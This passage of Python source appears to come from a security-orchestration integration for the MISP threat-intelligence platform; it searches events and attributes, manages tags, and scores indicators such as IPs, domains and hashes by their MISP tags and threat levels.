'This_community_only': 1, 'Connected_communities': 2, 
'All_communities': 3, 'Inherit_event': 5 } SIGHTING_TYPE_NAME_TO_ID = { 'sighting': 0, 'false_positive': 1, 'expiration': 2 } SIGHTING_TYPE_ID_TO_NAME = { '0': 'sighting', '1': 'false_positive', '2': 'expiration' } INDICATOR_TYPE_TO_DBOT_SCORE = { 'FILE': DBotScoreType.FILE, 'URL': DBotScoreType.URL, 'DOMAIN': DBotScoreType.DOMAIN, 'IP': DBotScoreType.IP, 'EMAIL': DBotScoreType.EMAIL, } DOMAIN_REGEX = ( r"([a-z¡-\uffff0-9](?:[a-z¡-\uffff0-9-]{0,61}" "[a-z¡-\uffff0-9])?(?:\\.(?!-)[a-z¡-\uffff0-9-]{1,63}(?<!-))*" "\\.(?!-)(?!(jpg|jpeg|exif|tiff|tif|png|gif|otf|ttf|fnt|dtd|xhtml|css" "|html)$)(?:[a-z¡-\uffff-]{2,63}|xn--[a-z0-9]{1,59})(?<!-)\\.?$" "|localhost)" ) MISP_SEARCH_ARGUMENTS = [ 'value', 'type', 'category', 'org', 'tags', 'from', 'to', 'event_id', 'uuid', 'to_ids', 'last', 'include_decay_score', 'include_sightings', 'include_correlations', 'limit', 'page', 'enforceWarninglist', 'include_feed_correlations', ] EVENT_FIELDS = [ 'id', 'orgc_id', 'org_id', 'date', 'threat_level_id', 'info', 'published', 'uuid', 'analysis', 'attribute_count', 'timestamp', 'distribution', 'proposal_email_lock', 'locked', 'publish_timestamp', 'sharing_group_id', 'disable_correlation', 'event_creator_email', 'Org', 'Orgc', 'RelatedEvent', 'Galaxy', 'Tag', 'decay_score', 'Object', 'Feed', ] ATTRIBUTE_FIELDS = [ 'id', 'event_id', 'object_id', 'object_relation', 'category', 'type', 'to_ids', 'uuid', 'timestamp', 'distribution', 'sharing_group_id', 'comment', 'deleted', 'disable_correlation', 'first_seen', 'last_seen', 'value', 'Event', 'Object', 'Galaxy', 'Tag', 'decay_score', 'Sighting', ] def extract_error(error: list) -> List[dict]: """ Extracting errors raised by PYMISP into readable response, for more information and examples please see UT: test_extract_error. Args: error: list of responses from error section Returns: List[Dict[str, any]]: filtered response """ return [{ 'code': err[0], 'message': err[1].get('message'), 'errors': err[1].get('errors') } for err in error] def dict_to_generic_object_format(args: dict) -> List[dict]: """ Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp. Args: args: dictionary describes MISP object Returns: list: list containing dicts that GenericObjectGenerator can take. 
Examples: >>> {'ip': '8.8.8.8', 'domain': 'google.com'} [{'ip': '8.8.8.8'}, {'domain': 'google.com'}] """ return [{k: v} for k, v in args.items()] def build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator: """ Args: template_name: template name as described in https://github.com/MISP/misp-objects args: arguments to create the generic object Returns: GenericObjectGenerator: object created in MISP Example: args should look like: [{'analysis_submitted_at': '2018-06-15T06:40:27'}, {'threat_score': {value=95, to_ids=False}}, {'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'}, {'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96}, {'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line """ misp_object = GenericObjectGenerator(template_name) misp_object.generate_attributes(args) return misp_object def misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str: """ Gets a timestamp from MISP response (1546713469) and converts it to human readable format """ return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else "" def replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]: """ Replacing keys from MISP's format to Demisto's (as appear in ENTITIESDICT) Args: obj_to_build (Union[dict, list, str]): object to replace keys in Returns: Union[dict, list, str]: same object type that got in """ if isinstance(obj_to_build, list): return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build] if isinstance(obj_to_build, dict): return { (MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key): replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items() } return obj_to_build def reputation_command_to_human_readable(outputs, score, events_to_human_readable): found_tag_id, found_tag_name = "", "" for event in events_to_human_readable: # removing those fields as they are shared by the events found_tag_id = event.pop('Tag_ID') found_tag_name = event.pop('Tag_Name') return { 'Attribute Type': outputs[0].get('Type'), 'Dbot Score': score, 'Attribute Value': outputs[0].get('Value'), 'Attribute Category': outputs[0].get('Category'), 'Timestamp': outputs[0].get('Timestamp'), 'Events with the scored tag': events_to_human_readable, 'Scored Tag ID': found_tag_id, 'Scored Tag Name': found_tag_name, } def limit_tag_output_to_id_and_name(attribute_dict, is_event_level): """ As tag list can be full of in unnecessary data, we want to limit this list to include only the ID and Name fields. In addition, returns set of the found tag ids. Some tags have a field called inherited. When it is set to 1 it says that it is an event's tag. Otherwise (if it is set to 0 or not exists) it says that it is an attribute's tag. If the data is event's (is_event_level = true) we would like to add to tag_set_ids all the tags (event ones and the event's attribute tags ones as it is part of the event scope). If the data is attribute's (is_event_level = false), and the tag is only related to an attribute we would like to add it to tag_set_ids. In any other case, we won't add the tag. Args: attribute_dict (dict): The dictionary that includes the tag list. is_event_level (bool): Whether the attribute_dict was received from an event object, meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags). 
""" output = [] tag_set_ids = set() tags_list = attribute_dict.get('Tag', []) for tag in tags_list: is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0' tag_id = tag.get('id') if is_event_level: tag_set_ids.add(tag_id) else: # attribute level if not is_event_tag: tag_set_ids.add(tag_id) output.append({'ID': tag_id, 'Name': tag.get('name')}) return output, tag_set_ids def parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ After getting all the attributes which match the required indicator value, this function parses the response. This function goes over all the attributes that found (after limit the attributes amount to the given limit) and by sub-functions calculated the score of the indicator. For the context data outputs, for every attribute we remove the "Related Attribute" list and limits the tags and galaxies lists. Eventually, the outputs will be a list of attributes along with their events objects. Note: When limits the attributes amount, we sort the attributes list by the event ids as the greater event ids are the newer ones. Returns: response (dict): The parsed outputs to context data (array of attributes). score: the indicator score found_tag: the tag (id) which made the indicator to get that score found_related_events (dict): contains info (name, id, threat level id) about all the events that include the indicator Please see an example for a response in test_data/reputation_command_response.json Please see an example for a parsed output in test_data/reputation_command_outputs.json """ response = copy.deepcopy(misp_response) attributes_list = response.get('Attribute') if not attributes_list: return None attributes_list = sorted(attributes_list, key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit] found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list) attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events) score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids, malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level) formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list}) return formatted_response, score, found_tag, found_related_events def prepare_attributes_array_to_context_data(attributes_list): attributes_tag_ids, event_tag_ids = set(), set() found_related_events = {} if not attributes_list: return None for attribute in attributes_list: attribute.pop("RelatedAttribute") # get rid of this useless list event = attribute.get('Event') convert_timestamp_to_readable(attribute, event) found_related_events[event.get("id")] = {"Event Name": event.get("info"), "Threat Level ID": event.get('threat_level_id'), "Event ID": event.get("id")} if event.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True) event['Tag'] = limit_tag_output event_tag_ids.update(tag_ids) if attribute.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False) attribute['Tag'] = limit_tag_output attributes_tag_ids.update(tag_ids) return found_related_events, attributes_tag_ids, event_tag_ids def convert_timestamp_to_readable(attribute, event): if attribute.get('timestamp'): attribute['timestamp'] = 
misp_convert_timestamp_to_date_string(attribute.get('timestamp')) if event: if event.get('timestamp'): attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp')) if event.get('publish_timestamp'): attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string( event.get('publish_timestamp')) def found_event_with_bad_threat_level_id(found_related_events): bad_threat_level_ids = ["1", "2", "3"] for event in found_related_events.values(): if event['Threat Level ID'] in bad_threat_level_ids: return True return False def get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level): """ Calculates the indicator score by following logic. Indicators of attributes and Events that: * have tags which configured as malicious will be scored 3 (i.e malicious). * have tags which configured as suspicious will be scored 2 (i.e suspicious). * don't have any tags configured as suspicious nor malicious will be scored by their event's threat level id. In such case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown. note: - In case the same tag appears in both Malicious tag ids and Suspicious tag ids lists the indicator will be scored as malicious. - Attributes tags (both malicious and suspicious) are stronger than events' tags. """ found_tag = None is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids) if is_attribute_tag_malicious: return Common.DBotScore.BAD, found_tag is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids) if is_attribute_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids) if is_event_tag_malicious: return Common.DBotScore.BAD, found_tag is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids) if is_event_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag # no tag was found if is_attribute_in_event_with_bad_threat_level: return Common.DBotScore.BAD, None return Common.DBotScore.NONE, None def get_new_misp_event_object(args): """ Create a new MISP event object and set the event's details. 
""" event = MISPEvent() event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')] threat_level_id_arg = args.get('threat_level_id') if threat_level_id_arg: event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg] analysis_arg = args.get('analysis') event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg event.info = args.get('info') if args.get('info') else 'Event from XSOAR' event.date = datetime.today() event.published = argToBoolean(args.get('published', 'False')) return event def create_event_command(demisto_args: dict): """Creating event in MISP with the given attribute args""" new_event = get_new_misp_event_object(demisto_args) new_event = PYMISP.add_event(new_event, True) if isinstance(new_event, dict) and new_event.get('errors'): raise DemistoException(new_event.get('errors')) event_id = new_event.id add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args) event = PYMISP.search(eventid=event_id) human_readable = f"## MISP create event\nNew event with ID: {event_id} has been successfully created.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(event), raw_response=event ) def add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None): """Adding attribute to a given MISP event object This function can be called as an independence command or as part of another command (create event for example) Args: event_id (int): Event ID to add attribute to internal (bool): if set to True, will not post results to Demisto demisto_args (dict): Demisto args new_event (MISPEvent): When this function was called from create event command, the attrubite will be added to that existing event. """ attributes_args = { 'id': demisto_args.get('event_id'), # misp event id 'type': demisto_args.get('type', 'other'), 'category': demisto_args.get('category', 'External analysis'), 'to_ids': argToBoolean(demisto_args.get('to_ids', True)), 'comment': demisto_args.get('comment'), 'value': demisto_args.get('value') } event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), "event_id") attributes_args.update({'id': event_id}) if event_id else None distribution = demisto_args.get('distribution') attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None if not new_event: response = PYMISP.search(eventid=event_id, pythonify=True) if not response: raise DemistoException( f"Error: An event with the given id: {event_id} was not found in MISP. 
please check it once again") new_event = response[0] # response[0] is MISP event new_event.add_attribute(**attributes_args) PYMISP.update_event(event=new_event) if internal: return value = attributes_args.get('value') updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value) human_readable = f"## MISP add attribute\nNew attribute: {value} was added to event id {new_event.id}.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(updated_event), raw_response=updated_event ) def generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): reputation_value_list = argToList(demisto_args.get(reputation_type), ',') command_results = [] for value in reputation_value_list: command_results.append( get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) return command_results def reputation_value_validation(value, dbot_type): if dbot_type == 'FILE': # hashFormat will be used only in output hash_format = get_hash_type(value) if hash_format == 'Unknown': raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256') if dbot_type == 'IP': if not is_ip_valid(value): raise DemistoException(f"Error: The given IP address: {value} is not valid") if dbot_type == 'DOMAIN': if not re.compile(DOMAIN_REGEX, regexFlags).match(value): raise DemistoException(f"Error: The given domain: {value} is not valid") if dbot_type == 'URL': if not re.compile(urlRegex, regexFlags).match(value): raise DemistoException(f"Error: The given url: {value} is not valid") if dbot_type == 'EMAIL': if not re.compile(emailRegex, regexFlags).match(value): raise DemistoException(f"Error: The given email address: {value} is not valid") def get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): """ This function searches for the given attribute value in MISP and then calculates it's dbot score. The score is calculated by the tags ids (attribute tags and event tags). Args: value (str): The indicator value (an IP address, email address, domain, url or file hash). dbot_type (str): Indicator type (file, url, domain, email or ip). malicious_tag_ids (set): Tag ids should be recognised as malicious. suspicious_tag_ids (set): Tag ids should be recognised as suspicious reliability (DBotScoreReliability): integration reliability score. attributes_limit (int) : Limits the number of attributes that will be written to the context Returns: CommandResults includes all the indicator results. 
""" reputation_value_validation(value, dbot_type) misp_response = PYMISP.search(value=value, controller='attributes', include_context=True, include_correlations=True, include_event_tags=True, enforce_warninglist=True, include_decay_score=True, includeSightings=True) indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type] is_indicator_found = misp_response and misp_response.get('Attribute') if is_indicator_found: outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit) dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=score, reliability=reliability, malicious_description="Match found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) all_attributes = outputs.get('Attribute') events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag) attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable) readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights, removeNull=True) readable_output += tableToMarkdown('Related events', list(found_related_events.values())) return CommandResults(indicator=indicator, raw_response=misp_response, outputs=all_attributes, outputs_prefix='MISP.Attribute', outputs_key_field='ID', readable_output=readable_output) else: dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=Common.DBotScore.NONE, reliability=reliability, malicious_description="No results were found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) return CommandResults(indicator=indicator, readable_output=f"No attributes found in MISP for value: {value}") def get_events_related_to_scored_tag(all_attributes, found_tag): """ This function searches for all the events that have the tag (i.e found_tag) which caused the indicator to be scored as malicious or suspicious. Args: all_attributes (dict): The parsed response from the MISP search attribute request found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is Unknown so no events should be found. Returns: list includes all the events that were detected as related to the tag. """ scored_events = [] if found_tag: for attribute in all_attributes: event = attribute.get('Event', {}) event_name = event.get('Info') scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name)) scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name)) return remove_duplicated_related_events(scored_events) def remove_duplicated_related_events(related_events): related_events_no_duplicates = [] for i in range(len(related_events)): if related_events[i] not in related_events[i + 1:]: related_events_no_duplicates.append(related_events[i]) return related_events_no_duplicates def search_events_with_scored_tag(object_data_dict, found_tag, event_name): """ By the given object we go over all the tags and search if found_tag is one of it's tags. If so, the event will be added to related_events list Args: object_data_dict (dict): Event or attribute dict which includes tags list. found_tag (str): The tag that was scored as malicious or suspicious. 
event_name (str): Name of the event """ related_events = [] object_tags_list = object_data_dict.get('Tag', []) for tag in object_tags_list: if tag.get('ID') == found_tag: event_id = get_event_id(object_data_dict) tag_name = tag.get('Name') related_events.append({'Event_ID': event_id, 'Event_Name': event_name, 'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')}) return related_events def get_event_id(data_dict): if data_dict.get('EventID'): return data_dict.get('EventID') elif data_dict.get('ID'): return data_dict.get('ID') return data_dict.get('Event', {}).get('ID') def get_dbot_indicator(dbot_type, dbot_score, value): if dbot_type == "FILE": hash_type = get_hash_type(value) if hash_type == 'md5': return Common.File(dbot_score=dbot_score, md5=value) if hash_type == 'sha1': return Common.File(dbot_score=dbot_score, sha1=value) if hash_type == 'sha256': return Common.File(dbot_score=dbot_score, sha256=value) if dbot_type == "IP": return Common.IP(ip=value, dbot_score=dbot_score) if dbot_type == "DOMAIN": return Common.Domain(domain=value, dbot_score=dbot_score) if dbot_type == "EMAIL": return Common.EMAIL(address=value, dbot_score=dbot_score) if dbot_type == "URL": return Common.URL(url=value, dbot_score=dbot_score) def build_misp_complex_filter(demisto_query: str): """ Examples are available in UT: test_build_misp_complex_filter. For more information please see build_complex_query in pymisp/api.py Args: demisto_query: complex query contains saved words: 'AND:', 'OR:' and 'NOT:' using ',' as delimiter for parameters and ';' as delimiter for operators. using the operators is optional. if 'demisto_query' does not contains any of the complex operators the original input will be returned Returns: str: dictionary created for misp to perform complex query or if no complex query found returns the original input """ regex_and = r'(AND:)([^\;]+)(;)?' regex_or = r'(OR:)([^\;]+)(;)?' regex_not = r'(NOT:)([^\;]+)(;)?' 
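    # Illustrative note (not part of the original source): given the delimiters
    # described in the docstring, a query such as
    #   "AND:tag1,tag2;NOT:tag3"
    # is expected to yield misp_query_params = {'and_parameters': ['tag1', 'tag2'],
    # 'not_parameters': ['tag3']}, which is then handed to
    # PYMISP.build_complex_query(); a plain value with none of the AND:/OR:/NOT:
    # prefixes falls through and is returned unchanged.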
misp_query_params = dict() match_and = re.search(regex_and, demisto_query, re.MULTILINE) match_or = re.search(regex_or, demisto_query, re.MULTILINE) match_not = re.search(regex_not, demisto_query, re.MULTILINE) is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters') is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters') is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters') is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator if is_complex_search: return PYMISP.build_complex_query(**misp_query_params) return demisto_query def is_misp_complex_search_helper(match_operator, misp_query_params, operator_key): is_complex_search = False if match_operator is not None: misp_query_params[operator_key] = match_operator.group(2).split(',') is_complex_search = True return is_complex_search def prepare_args_to_search(controller): demisto_args = demisto.args() args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args} # Replacing keys and values from Demisto to Misp's keys if 'type' in args_to_misp_format: args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type') if 'to_ids' in args_to_misp_format: args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0 if 'from' in args_to_misp_format: args_to_misp_format['date_from'] = args_to_misp_format.pop('from') if 'to' in args_to_misp_format: args_to_misp_format['date_to'] = args_to_misp_format.pop('to') if 'event_id' in args_to_misp_format: args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id')) if 'last' in args_to_misp_format: args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last') if 'include_decay_score' in args_to_misp_format: args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0 if 'include_sightings' in args_to_misp_format: args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0 if 'include_correlations' in args_to_misp_format: args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0 if 'enforceWarninglist' in args_to_misp_format: args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0 if 'include_feed_correlations' in args_to_misp_format: args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get( 'include_feed_correlations') == 'true' else 0 args_to_misp_format.pop('include_feed_correlations') if 'limit' not in args_to_misp_format: args_to_misp_format['limit'] = '50' if 'tags' in args_to_misp_format: args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags']) args_to_misp_format['controller'] = controller demisto.debug(f"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}") return args_to_misp_format def build_attributes_search_response(response: Union[dict, requests.Response], include_correlations=False) -> dict: """ Convert the response of attribute search returned from MISP to the context output format. 
""" response_object = copy.deepcopy(response) if include_correlations: # return full related attributes only if the user wants to get them back ATTRIBUTE_FIELDS.append('RelatedAttribute') if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return get_limit_attribute_search_outputs(attributes) def get_limit_attribute_search_outputs(attributes): for i in range(len(attributes)): attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]} build_galaxy_output(attributes[i]) build_tag_output(attributes[i]) build_sighting_output_from_attribute_search_response(attributes[i]) convert_timestamp_to_readable(attributes[i], None) formatted_attributes = replace_keys_from_misp_to_context_data(attributes) return formatted_attributes def build_galaxy_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Galaxy'): given_object['Galaxy'] = [ { 'name': star.get('name'), 'type': star.get('type'), 'description': star.get('description') } for star in given_object['Galaxy'] ] def build_object_output(event): if event.get('Object'): event['Object'] = [ { 'name': event_object.get('name'), 'uuid': event_object.get('uuid'), 'description': event_object.get('description'), 'id': event_object.get('id') } for event_object in event['Object'] ] def build_tag_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Tag'): given_object['Tag'] = [ {'Name': tag.get('name'), 'is_galaxy': tag.get('is_galaxy') } for tag in given_object.get('Tag') ] def build_sighting_output_from_attribute_search_response(attribute): if attribute.get('Sighting'): attribute['Sighting'] = [ {'type': sighting.get('type') } for sighting in attribute.get('Sighting') ] def build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list: """returns list of attributes' values that match the search query when user set the arg 'compact' to True""" if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return [attribute.get('value') for attribute in attributes] def pagination_args_validation(page, limit): if page and page < 0: raise DemistoException("page should be zero or a positive number") if limit and limit < 0: raise DemistoException("limit should be zero or a positive number") def attribute_response_to_markdown_table(response: dict): attribute_highlights = [] for attribute in response: event = attribute.get('Event', {}) attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get( 'Tag') else None attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in attribute.get('Sighting')] if attribute.get('Sighting') else None attribute_highlights.append({ 'Attribute ID': attribute.get('ID'), 'Event ID': attribute.get('EventID'), 'Attribute Category': attribute.get('Category'), 'Attribute Type': attribute.get('Type'), 'Attribute Comment': attribute.get('Comment'), 'Attribute Value': attribute.get('Value'), 'Attribute Tags': attribute_tags, 'Attribute Sightings': attribute_sightings, 'To IDs': attribute.get('ToIDs'), 'Timestamp': attribute.get('Timestamp'), 'Event Info': event.get('Info'), 'Event Organization ID': event.get('OrganizationID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID') }) return 
attribute_highlights def search_attributes(demisto_args: dict) -> CommandResults: """Execute a MISP search over 'attributes'""" args = prepare_args_to_search('attributes') outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False)) include_correlations = argToBoolean(demisto_args.get('include_correlations', False)) page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: if outputs_should_include_only_values: response_for_context = build_attributes_search_response_return_only_values(response) number_of_results = len(response_for_context) md = tableToMarkdown(f"MISP search-attributes returned {number_of_results} attributes", response_for_context[:number_of_results], ["Value"]) else: response_for_context = build_attributes_search_response(response, include_correlations) attribute_highlights = attribute_response_to_markdown_table(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-attributes returned {len(response_for_context)} attributes\n {pagination_message}", attribute_highlights, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Attribute", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No attributes found in MISP for the given filters: {args}") def build_events_search_response(response: Union[dict, requests.Response]) -> dict: """ Convert the response of event search returned from MISP to the context output format. please note: attributes are excluded from search-events output as the information is too big. User can use the command search-attributes in order to get the information about the attributes. 
""" response_object = copy.deepcopy(response) if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) events = [event.get('Event') for event in response_object] for i in range(0, len(events)): # Filter object from keys in event_args events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]} events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event build_galaxy_output(events[i]) build_tag_output(events[i]) build_object_output(events[i]) events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp')) events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp')) formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore return formatted_events # type: ignore def event_to_human_readable_tag_list(event): event_tags = event.get('Tag', []) if event_tags: return [tag.get('Name') for tag in event_tags] def event_to_human_readable_galaxy_list(event): event_galaxies = event.get('Galaxy', []) if event_galaxies: return [galaxy.get('Name') for galaxy in event.get('Galaxy')] def event_to_human_readable_object_list(event): event_objects = event.get('Object', []) if event_objects: return [event_object.get('ID') for event_object in event.get('Object')] def event_to_human_readable(response: dict): event_highlights = [] for event in response: event_tags = event_to_human_readable_tag_list(event) event_galaxies = event_to_human_readable_galaxy_list(event) event_objects = event_to_human_readable_object_list(event) event_highlights.append({ 'Event ID': event.get('ID'), 'Event Tags': event_tags, 'Event Galaxies': event_galaxies, 'Event Objects': event_objects, 'Publish Timestamp': event.get('PublishTimestamp'), 'Event Info': event.get('Info'), 'Event Org ID': event.get('OrganizationID'), 'Event Orgc ID': event.get('OwnerOrganization.ID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID'), }) return event_highlights def search_events(demisto_args: dict) -> CommandResults: """ Execute a MISP search using the 'event' controller. """ args = prepare_args_to_search('events') page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: response_for_context = build_events_search_response(response) event_outputs_to_human_readable = event_to_human_readable(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-events returned {len(response_for_context)} events.\n {pagination_message}", event_outputs_to_human_readable, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Event", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No events found in MISP for the given filters: {args}") def delete_event(demisto_args: dict): """ Gets an event id and deletes it. 
""" event_id = demisto_args.get('event_id') response = PYMISP.delete_event(event_id) if 'errors' in response: raise DemistoException(f'Event ID: {event_id} has not found in MISP: \nError message: {response}') else: human_readable = f'Event {event_id} has been deleted' return CommandResults(readable_output=human_readable, raw_response=response) def add_tag(demisto_args: dict, is_attribute=False): """ Function will add tag to given UUID of event or attribute. is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False). """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: PYMISP.tag(uuid, tag) # add the tag except PyMISPError: raise DemistoException("Adding the required tag was failed. Please make sure the UUID exists.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully added to attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully added to event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def remove_tag(demisto_args: dict, is_attribute=False): """ Function will remove tag to given UUID of event or attribute. is_attribute (bool): if the given UUID is an attribute's one. Otherwise it's event's. """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: response = PYMISP.untag(uuid, tag) if response and response.get('errors'): raise DemistoException(f'Error in `{demisto.command()}` command: {response}') except PyMISPError: raise DemistoException("Removing the required tag was failed. 
